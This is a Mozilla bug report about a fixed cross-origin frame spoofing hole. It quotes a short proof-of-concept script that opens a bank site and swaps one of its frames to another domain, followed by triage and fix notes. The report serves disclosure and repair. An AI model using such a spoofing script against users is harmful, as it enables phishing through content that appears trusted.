Closed Bug 20682 Opened 21 years ago Closed 20 years ago

Frame spoofing #2

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

Tracking

()

VERIFIED FIXED

People

(Reporter: joro, Assigned: security-bugs)

References

()

Details

(Whiteboard: [nsbeta2+])

There is a vulnerability, which allows spoofing frames.
The code is:
------------------------------------------
<SCRIPT>
b=window.open("http://www.citybank.com");
setTimeout('b.frames[2].location="http://www.mozilla.org";',6000);
</SCRIPT>
------------------------------------------
Communicator 4.7 gives security error on this.
Status: NEW → ASSIGNED
Target Milestone: M15
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
Keywords: beta2
I don't see signs of progress for M15, and since Norris is out this week, I'm 
pushing this to M16 (so that we can branch)
Target Milestone: M15 → M16
Target Milestone: M16 → M17
Keywords: nsbeta2
Bulk reassigning most of norris's bugs to mstoltz.
Assignee: norris → mstoltz
Status: ASSIGNED → NEW
Putting on [nsbeta2+] radar for beta2 fix.
Whiteboard: [nsbeta2+]
Changed QA contact to Cathy.
QA Contact: junruh → czhang
I have reproduced this bug. Looks like, for whatever reason, we don't check
writing to "location", only reading.
Status: NEW → ASSIGNED
Assigning QA to czhang
This will be fixed by defaulting to sameOrigin; otherwise, we need to check
location.href.write as well as .read.
Group: netscapeconfidential?
Depends on: 28443
Looks fixed with 7/6 build on NT. Try new testcase:
http://rocknroll/users/jtaylor/publish/TestCases/xdomain/frames.html
Fix confirmed by jtaylor. Marking FIXED.
Status: ASSIGNED → RESOLVED
Closed: 20 years ago
Resolution: --- → FIXED
verified
Status: RESOLVED → VERIFIED
Opening fixed security bugs to the public.
Group: netscapeconfidential?
Test for this got added in bug 408052.
Flags: in-testsuite+
You need to log in before you can comment on or make changes to this bug.